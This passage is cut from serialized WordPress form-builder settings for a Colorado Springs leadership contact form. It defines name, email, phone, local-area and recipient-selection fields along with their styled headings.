class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Leadership Communications</span></span></span></strong></span></h3>\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:201:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Leadership Communications</span></span></span></strong></span></h3>\";s:3:\"key\";s:7:\"html_32\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:7:\"html_32\";s:14:\"drawerDisabled\";b:0;}}i:121;a:1:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:10:\"textbox_33\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:10:\"textbox_33\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}}i:122;a:1:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"lastname_34\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:11:\"lastname_34\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}}i:123;a:1:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:8:\"email_35\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:8:\"email_35\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}}i:124;a:1:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"phone\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:8:\"phone_36\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:8:\"phone_36\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}}i:125;a:1:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:15:\"Your Local Area\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:7:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:13:\"listselect_37\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:15:\"Your Local Area\";s:9:\"field_key\";s:13:\"listselect_37\";}}i:126;a:1:{s:8:\"settings\";a:17:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:2:\"hr\";s:5:\"label\";s:2:\"hr\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:5:\"hr_38\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:2:\"hr\";s:9:\"field_key\";s:5:\"hr_38\";s:14:\"drawerDisabled\";b:0;}}i:127;a:1:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:37:\"Colorado Springs Leadership Positions\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:196:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Leadership Positions</span></span></span></strong></span></h3>\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:196:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Leadership Positions</span></span></span></strong></span></h3>\";s:3:\"key\";s:7:\"html_39\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:37:\"Colorado Springs Leadership Positions\";s:9:\"field_key\";s:7:\"html_39\";}}i:128;a:1:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:41:\"Select the person you would like to email\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:6:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"Local Director\";s:5:\"value\";s:14:\"Local Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 